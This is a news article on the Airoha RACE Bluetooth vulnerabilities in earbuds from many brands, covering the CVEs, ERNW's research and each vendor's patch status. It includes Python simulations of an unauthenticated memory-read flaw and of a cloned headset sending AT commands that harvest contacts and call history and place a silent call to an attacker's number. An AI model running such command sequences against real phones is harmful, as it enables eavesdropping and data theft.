
Apple released a firmware patch this week for Beats Studio Buds that closes a high-severity Bluetooth vulnerability allowing an attacker standing nearby to listen through the earbuds' microphone, without ever touching the owner's phone. But the fix addresses only one corner of a supply-chain problem that spans nearly 30 confirmed products from Sony, Bose, JBL, Marshall, and several other brands, all built on the same vulnerable chip.
If you own Bluetooth earbuds or headphones from any of the major brands listed in this article, your device may still be unpatched — and a nearby attacker could exploit that window in a coffee shop, an airport, or a hotel lobby.
The vulnerability traces to a proprietary protocol called RACE — short for Realtek/Airoha Command Extensions — embedded in Bluetooth system-on-chip hardware manufactured by Airoha Systems, a subsidiary of Taiwan's MediaTek. RACE was designed as a factory diagnostic tool, intended for use during production-line quality testing and firmware flashing. Its purpose was to let engineers read and write directly to a device's RAM and flash memory during manufacturing.
The problem is that it was shipped in consumer-facing firmware without any authentication gate.
ERNW researchers published full technical details of the RACE vulnerability in December 2025, alongside a white paper and a testing toolkit for consumers.
Airoha's Bluetooth chips expose RACE over two separate Bluetooth interfaces: Bluetooth Classic (the BR/EDR radio used for audio streaming and hands-free calling) and Bluetooth Low Energy (BLE, used for device control and status). In both cases, researchers confirmed that pairing — the cryptographic handshake that is supposed to prove device ownership before granting sensitive access — was not enforced. Any attacker within Bluetooth range could connect silently and invoke the RACE protocol without the device owner's knowledge.
This is the engineering failure behind three CVE entries catalogued in the National Vulnerability Database: CVE-2025-20700 (missing authentication for BLE GATT services), CVE-2025-20701 (missing authentication for Bluetooth BR/EDR connections), and CVE-2025-20702 (exploitation of privileged RACE protocol capabilities). CVE-2025-20701, the flaw Apple's patch addresses, carries a Common Vulnerability Scoring System rating of 8.8 out of 10, placing it firmly in the "High" severity band.
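To make the missing authentication gate concrete, here is an added illustration (not Airoha's firmware or ERNW's code) of a toy factory-diagnostic command handler of the kind described above. The frame layout, the opcodes, the `LinkState` fields and the sample link key are all hypothetical and constructed for the example; RACE's real command set is not reproduced. The vulnerable dispatcher executes any memory command regardless of the link's pairing and encryption state, which is the reference-firmware behaviour the article describes; the hardened dispatcher gates memory access on a paired, encrypted link and additionally locks flash writes to a production-mode flag.

```python
"""Toy diagnostic-command handler: ungated (vulnerable) vs. gated (hardened).
Hypothetical protocol, written for this article; not Airoha's RACE."""
import struct
from dataclasses import dataclass, field

# Hypothetical opcodes; RACE's real command set is not reproduced here.
OP_GET_VERSION = 0x01
OP_READ_RAM = 0x02
OP_READ_FLASH = 0x03
OP_WRITE_FLASH = 0x04

# Constructed sample: a 16-byte Bluetooth link key stored in flash at 0x10.
SAMPLE_LINK_KEY = bytes(range(0xA0, 0xB0))


@dataclass
class LinkState:
    """Security state of the Bluetooth link a frame arrived on (hypothetical)."""
    paired: bool = False        # bonded: link key / LTK established with this peer
    encrypted: bool = False     # link currently encrypted with that key
    factory_mode: bool = False  # asserted only by the production-line tooling


@dataclass
class Device:
    version: bytes = b"fw-1.0"
    ram: bytearray = field(default_factory=lambda: bytearray(64))
    flash: bytearray = field(default_factory=lambda: bytearray(b"\xff" * 64))


def build_frame(op, addr, length, payload=b""):
    """Hypothetical frame: opcode(1) | address(2, big-endian) | length(1) | payload."""
    return struct.pack(">BHB", op, addr, length) + payload


def parse_frame(frame):
    if len(frame) < 4:
        raise ValueError("short frame")
    op, addr, length = struct.unpack(">BHB", frame[:4])
    payload = frame[4:]
    if op == OP_WRITE_FLASH and len(payload) != length:
        raise ValueError("payload length does not match header")
    return op, addr, length, payload


def execute(dev, op, addr, length, payload):
    """Raw memory access with no policy: what the production-line tool needs."""
    if op == OP_GET_VERSION:
        return (b"OK", dev.version)
    if op not in (OP_READ_RAM, OP_READ_FLASH, OP_WRITE_FLASH):
        return (b"ERR", b"unknown opcode")
    mem = dev.ram if op == OP_READ_RAM else dev.flash
    if addr + length > len(mem):
        return (b"ERR", b"out of range")
    if op == OP_WRITE_FLASH:
        mem[addr:addr + length] = payload
        return (b"OK", b"")
    return (b"OK", bytes(mem[addr:addr + length]))


def vulnerable_dispatch(dev, link, frame):
    """Reference-firmware behaviour as the article describes it: the link's
    pairing and encryption state is never consulted before executing."""
    return execute(dev, *parse_frame(frame))


def hardened_dispatch(dev, link, frame):
    """Same protocol, gated: memory access needs a paired, encrypted link, and
    flash writes are additionally refused outside production mode."""
    op, addr, length, payload = parse_frame(frame)
    if op == OP_GET_VERSION:                     # harmless; fine to answer anyone
        return execute(dev, op, addr, length, payload)
    if not (link.paired and link.encrypted):
        return (b"ERR", b"unauthenticated link")
    if op == OP_WRITE_FLASH and not link.factory_mode:
        return (b"ERR", b"flash writes locked outside production")
    return execute(dev, op, addr, length, payload)


def attacker_reads_link_key(dispatch):
    """An attacker who merely connected (never paired) asks for the key region."""
    dev = Device()
    dev.flash[0x10:0x20] = SAMPLE_LINK_KEY
    unpaired = LinkState()                       # connected, never bonded
    return dispatch(dev, unpaired, build_frame(OP_READ_FLASH, 0x10, 16))
```

`attacker_reads_link_key(vulnerable_dispatch)` hands the stored key to an unpaired peer; the hardened variant answers only the version query to such a peer. A stricter design than the one shown here, and the one a practitioner should prefer, compiles the diagnostic interface out of production firmware entirely rather than gating it at runtime.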
Apple's own advisory described the risk in narrow terms, noting that an attacker within Bluetooth range could listen through the microphone of a Beats Studio Buds unit that was "not yet paired and actively seeking pair requests." That framing, accurate as far as it goes, describes only the simplest exploit.
The researchers who discovered the vulnerabilities — Dennis Heinze and Frieder Steinmetz of ERNW GmbH, a German cybersecurity firm — demonstrated a substantially more damaging attack chain at the 39C3 hacker conference in Hamburg in December 2025. In that demonstration, an attacker connected silently to a vulnerable headphone over BLE, used RACE to dump the device's flash memory, extracted the Bluetooth link keys stored there, and then used those keys to impersonate the headphones to the victim's paired smartphone. Once the phone accepted the rogue device as the legitimate headphones, the attacker used the Bluetooth Hands-Free Profile — the standard used for hands-free calling — to issue AT commands to the phone.
The results of that command access included: silently placing or answering calls; reading the victim's phone number, contact list, and call history; triggering Siri or Google Assistant to send messages; and eavesdropping on ambient audio by placing a silent call to an attacker-controlled number. Heinze and Steinmetz also used the chain at 39C3 to hijack a WhatsApp session and access Amazon account data.
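The reason those results follow so directly from link-key theft is that the Hands-Free Profile offers the phone no way to tell a cloned headset from the real one: once the service-level connection is up, the phone answers AT commands on trust in the link. The following added example (a simulation, not ERNW's 39C3 demo code) models a phone-side audio gateway and the command sequence an impersonating hands-free unit would send. The AG feature bits, phone numbers, contacts and call history are constructed; the BRSF/CIND/CMER handshake, ATD, AT+CLCC, AT+CNUM, AT+BVRA and AT+CHUP are standard HFP commands, while AT+CPBS/AT+CPBR come from 3GPP 27.007 and are accepted by many, not all, phones over the HFP channel.

```python
"""Simulated HFP exchange: phone (audio gateway, AG) vs. impersonating HF.
Constructed sample data; standard HFP / 3GPP 27.007 command syntax."""
import re

# Constructed sample phone data; no real phone or contacts are involved.
SAMPLE_OWN_NUMBER = "+15550100"
SAMPLE_PHONEBOOK = {
    "ME": [("Alice", "+15550101"), ("Bob", "+15550102")],  # stored contacts
    "DC": [("", "+15550199")],                             # dialed-call history
}
ATTACKER_NUMBER = "+15550999"  # hypothetical attacker-controlled line


class AudioGateway:
    """Minimal phone-side HFP AG. It checks nothing beyond a completed service
    level connection (SLC); the trust came from the Bluetooth link key."""

    def __init__(self):
        self.slc_done = False
        self.calls = []            # numbers of active outgoing calls
        self.voice_assistant = False
        self.pb_storage = "ME"
        self.transcript = []       # both sides' lines, in order

    def send(self, cmd):
        """HF -> AG command; returns the AG's response lines."""
        self.transcript.append("HF> " + cmd)
        lines = self._handle(cmd)
        self.transcript.extend("AG> " + l for l in lines)
        return lines

    def _handle(self, cmd):
        # SLC establishment (HFP): BRSF, CIND=?, CIND?, CMER.
        if cmd.startswith("AT+BRSF="):
            return ["+BRSF: 1023", "OK"]            # hypothetical AG feature bits
        if cmd == "AT+CIND=?":
            return ['+CIND: ("service",(0,1)),("call",(0,1)),("callsetup",(0-3)),'
                    '("battchg",(0-5)),("signal",(0-5)),("roam",(0,1)),("callheld",(0-2))',
                    "OK"]
        if cmd == "AT+CIND?":
            return ["+CIND: 1,0,0,5,5,0,0", "OK"]
        if cmd.startswith("AT+CMER="):
            self.slc_done = True
            return ["OK"]
        if not self.slc_done:
            return ["ERROR"]
        # Everything below is open to whoever holds the paired link key.
        if cmd == "AT+CNUM":                         # subscriber's own number
            return ['+CNUM: ,"%s",145,,4' % SAMPLE_OWN_NUMBER, "OK"]
        m = re.fullmatch(r"ATD(\+?\d+);", cmd)       # dial a number
        if m:
            self.calls.append(m.group(1))
            return ["OK"]
        if cmd == "AT+CLCC":                         # list current calls
            return ['+CLCC: %d,0,0,0,0,"%s",145' % (i + 1, n)
                    for i, n in enumerate(self.calls)] + ["OK"]
        if cmd == "AT+CHUP":                         # hang up
            self.calls.clear()
            return ["OK"]
        if cmd.startswith("AT+BVRA="):               # voice recognition on/off
            self.voice_assistant = cmd.endswith("1")
            return ["OK"]
        m = re.fullmatch(r'AT\+CPBS="(\w+)"', cmd)   # 3GPP 27.007: select phonebook
        if m and m.group(1) in SAMPLE_PHONEBOOK:
            self.pb_storage = m.group(1)
            return ["OK"]
        m = re.fullmatch(r"AT\+CPBR=(\d+),(\d+)", cmd)  # 3GPP 27.007: read entries
        if m:
            lo, hi = int(m.group(1)), int(m.group(2))
            entries = SAMPLE_PHONEBOOK[self.pb_storage][lo - 1:hi]
            return ['+CPBR: %d,"%s",145,"%s"' % (lo + i, num, name)
                    for i, (name, num) in enumerate(entries)] + ["OK"]
        return ["ERROR"]


def _pb_entries(lines):
    """Parse +CPBR lines into (name, number) pairs."""
    return [(l.split('"')[3], l.split('"')[1]) for l in lines if l.startswith("+CPBR")]


def rogue_hf_session(ag):
    """What an impersonating HF can do once the phone accepts it: the same
    command set a legitimate headset uses, with no further authentication."""
    for cmd in ("AT+BRSF=191", "AT+CIND=?", "AT+CIND?", "AT+CMER=3,0,0,1"):
        ag.send(cmd)                                   # bring up the SLC
    result = {}
    result["own_number"] = ag.send("AT+CNUM")[0].split(",")[1].strip('"')
    ag.send('AT+CPBS="ME"')
    result["contacts"] = _pb_entries(ag.send("AT+CPBR=1,10"))
    ag.send('AT+CPBS="DC"')
    result["dialed"] = _pb_entries(ag.send("AT+CPBR=1,10"))
    ag.send("ATD%s;" % ATTACKER_NUMBER)                # silent call: mic audio leaves the phone
    result["active_calls"] = [l.split('"')[1] for l in ag.send("AT+CLCC") if l.startswith("+CLCC")]
    ag.send("AT+BVRA=1")                               # wake the voice assistant
    result["assistant_on"] = ag.voice_assistant
    return result
```

Running `rogue_hf_session(AudioGateway())` returns the harvested number, contacts and call history, the attacker-bound call and the assistant state; `ag.transcript` holds the full two-sided exchange. Sending any post-SLC command before the handshake yields `ERROR`, which is the only check the profile applies.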
"Any vulnerable device can be compromised if the attacker is in Bluetooth range," Heinze wrote in the initial June 2025 ERNW advisory. "That is the only precondition."
The full attack requires meaningful technical skill and sustained physical proximity. No confirmed real-world exploitation has been documented. However, ERNW noted that the calculus changes for journalists, executives, government officials, and diplomats — individuals in environments where a conversation's contents carry high value and where an adversary with the resources to execute the attack is more likely to be present.
The deeper structural problem exposed by the Airoha case is not a missing patch — it is a missing boundary.
When Airoha designed the RACE protocol for factory use, no mechanism existed in the SDK to disable or gate it before devices left the production line. Manufacturers who licensed Airoha's chips received reference firmware that included RACE as an active, unauthenticated interface. Most built their products on top of that reference implementation without knowing — or removing — the factory tool that was still running inside.
This is the pattern that distinguishes an SDK supply-chain vulnerability from a conventional product flaw. A single company making a mistake affects its own customers. An SDK vendor shipping a flaw to 30-plus manufacturers creates 30-plus independent patch obligations, each with its own release cadence, update infrastructure, and consumer awareness campaign. Some of those manufacturers may release fixes quickly; others may never issue one.
Airoha shipped a corrected SDK to device makers on June 4, 2025, eight days before ERNW's initial partial disclosure at TROOPERS 2025. That came only after a long silence: ERNW first reported the flaws to Airoha on March 25, 2025, and the company issued its first response on May 27, 2025, 63 days later.
The patch timeline across the confirmed affected brands has been uneven.
JBL moved fastest among the major vendors. The company released over-the-air firmware updates for the JBL Live Buds 3 (version 8.0.0) on July 8, 2025, and for the JBL Endurance Race 2 (version 5.4.0) on July 30, 2025, through the JBL Headphones app. Bose confirmed a fix for the QuietComfort Earbuds was available by January 2026. Marshall and Beyerdynamic both issued updates in the months following Airoha's patched SDK release. Sony, which initially failed to respond to ERNW's direct communications, acknowledged the issue only after learning it would be disclosed publicly at TROOPERS 2025, and released firmware updates in early 2026.
Jabra's response was more complex: ERNW's technical testing found that the Jabra Elite 8 Active earbuds were not vulnerable to CVE-2025-20701's Bluetooth Classic vector, apparently because Jabra had independently configured its SDK to enforce pairing on Classic connections. The Jabra Link 390 Bluetooth adapter received a firmware fix in December 2025.
Apple's Beats Studio Buds Firmware Update 1B211 shipped June 16, 2026 — roughly twelve months after Airoha delivered the patched SDK to its hardware partners. Apple's advisory described the flaw as rooted in "open source code" and noted that Apple software was among the affected projects. The patch deploys automatically when the earbuds are placed in their charging case near a paired iPhone, iPad, or Mac. Users can confirm their firmware version at Settings → Bluetooth → tap the info icon next to Beats Studio Buds.
Apple's AirPods Pro 2 and AirPods Pro 3 received a separate firmware update (8B41) on the same day but required no CVE-2025-20701 fix; those models run Apple's proprietary audio silicon rather than an Airoha chip.
The pairing-window vulnerability carries particular weight in professional settings. Bluetooth earbuds have become standard equipment for video calls, internal meetings, and voice communications in corporate environments. An employee who opens their earbud case near an attacker, in a conference lobby, a shared coworking space, or on public transit, briefly puts the earbuds into discoverable pairing mode, in which they accept connection attempts from any device within range.
ERNW specifically called out high-risk groups in its original advisory: journalists, attorneys, diplomats, executives, and anyone in a role where overheard audio carries material value to a third party.
Beyond the immediate eavesdropping risk, the full attack chain — link key extraction, device impersonation, Bluetooth Hands-Free Profile command injection — represents an attack surface that does not require the phone to be compromised at all. The phone's own trust model is exploited using credentials extracted from the headphone.
Enterprise security teams should audit which Bluetooth audio devices are in use across their organizations and verify firmware versions against the affected product list in ERNW's White Paper 74, published December 27, 2025, which details the full scope of affected hardware and recommended remediation steps.
For Beats Studio Buds owners, Firmware Update 1B211 closes CVE-2025-20701. To trigger the update manually: place both earbuds in the charging case, close the lid, connect the case to power or ensure it is charged, and keep the case within Bluetooth range of a paired iPhone, iPad, or Mac for at least 30 minutes. The update installs automatically.
For owners of other affected hardware, firmware update status varies by manufacturer. JBL, Bose, Marshall, and Beyerdynamic have all released patches accessible through their companion apps or support pages. Sony updates are available through the Sony Headphones Connect app. Users of devices from lesser-known Airoha-chip brands should check their manufacturer's support pages directly.
Until a patch is confirmed installed, ERNW recommends the following practices: check firmware immediately using the manufacturer's companion app; remove unknown paired devices from your phone's Bluetooth settings; avoid leaving earbuds in discoverable pairing mode in high-risk environments; and disable Bluetooth when not in active use. For high-sensitivity professional environments, wired audio connections eliminate the attack surface entirely.
The publicly released RACE Toolkit allows technically capable users and security researchers to test whether a specific device remains vulnerable.
Are AirPods affected by the Airoha Bluetooth flaw?
No. AirPods Pro 2 and AirPods Pro 3 run Apple's proprietary audio silicon and are not built on Airoha chips. They received a separate firmware update (8B41) on June 16, 2026, but that update did not include a CVE-2025-20701 fix because none was needed.
Which headphones are confirmed vulnerable to CVE-2025-20701?
Confirmed affected devices include Sony's WF-1000XM5, WH-1000XM5, and WH-1000XM6; the Bose QuietComfort Earbuds; the JBL Live Buds 3 and Endurance Race 2; and multiple Marshall models including the Motif II, Major V, Minor IV, and Stanmore III. The full confirmed list covers approximately 29 products from 10 brands. Any device using an Airoha Bluetooth chip not on the confirmed list should be treated as potentially vulnerable until the manufacturer confirms otherwise. Use the ERNW RACE Toolkit to test specific devices.
Can someone listen through my earbuds without me knowing?
Yes, under specific conditions. On affected devices the BLE and Bluetooth Classic interfaces that expose RACE do not enforce pairing, so a nearby attacker can connect silently and use the microphone or read device memory whether or not the device is in pairing mode; Apple's advisory for Beats Studio Buds describes the narrower case of earbuds that are unpaired and actively seeking pairing requests. The full attack chain requires meaningful technical skill and sustained physical proximity. No confirmed real-world exploitation has been documented. Applying available firmware patches eliminates the vulnerability.
Does this Airoha chip flaw affect devices I already own, even if I bought them years ago?
Yes. The vulnerability exists in the Airoha chip's firmware and affects all devices built on vulnerable Airoha chip variants regardless of purchase date. The fix requires a firmware update delivered by each individual manufacturer — not an operating system update. If your manufacturer has not released a patch, the device remains exposed.
